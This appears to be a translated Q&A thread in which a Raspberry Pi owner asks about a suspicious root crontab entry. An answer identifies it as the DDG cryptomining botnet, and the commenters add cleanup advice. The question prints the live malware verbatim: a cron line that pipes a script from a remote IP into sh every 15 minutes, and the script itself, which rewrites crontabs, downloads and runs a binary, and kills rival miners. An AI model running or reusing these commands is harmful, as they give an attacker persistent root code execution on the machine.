每 15 分钟运行一次“xribfa4”的可疑 crontab 条目

Question

每 15 分钟运行一次“xribfa4”的可疑 crontab 条目

我想在我的 Raspberry Pi 上的根 crontab 文件中添加一些内容，但发现一个对我来说似乎很可疑的条目，在谷歌上搜索它的一部分没有发现任何内容。

Crontab 条目：

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Run Code Online (Sandbox Code Playgroud)

内容为http://103.219.112.66:8000/i.sh：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Run Code Online (Sandbox Code Playgroud)

我的 Linux 知识有限，但对我来说，从印度尼西亚服务器下载二进制文件并以 root 用户身份定期运行它们似乎并不常见。

这是什么？我该怎么办？

Answer 1

GAD*_*D3R 80

它是一个 DDG 挖矿僵尸网络，它是如何工作的：

利用 RCE 漏洞
修改 crontab
下载合适的挖矿程序（用go编写）
开始挖矿过程

DDG：针对数据库服务器的挖矿僵尸网络

SystemdMiner 当僵尸网络借用另一个僵尸网络的基础设施时

U&L ：如何在 AWS EC2 实例上杀死 minerd 恶意软件？（受损的服务器）

@Mark 这个好消息怎么样？有人使用未知入口点完全控制了他的 Pi，并且可以完全访问 Pi 上的任何秘密（包括但不限于密码）。矿工跑不跑真的在“小不便”的境界。 (13认同)
不要忘记对有根机器的通常建议：尝试弄清楚它们是如何进入的，以便您可以修复漏洞。从中学习，并提高您的安全性。最后，核对并重新安装机器。 (8认同)
是的，实际上似乎就是这样。谢谢！如果没有新出现，会将其标记为答案。 (4认同)
@marcelm，攻击者完全控制了它，然后几乎可以肯定没有对这种控制做任何重要的事情。 (4认同)
好消息是他们似乎没有针对 Pi 的矿工，仅针对 i686 和 x86_64。 (3认同)
@Mark 除非您对这种妥协负有责任，否则您无法知道在发现之前执行了哪些其他令人讨厌的事情。这可能是一系列不同有效载荷中的最新有效载荷。 (2认同)

归档时间：	5 年，11 月前
查看次数：	9529 次
最近记录：	5 年，11 月前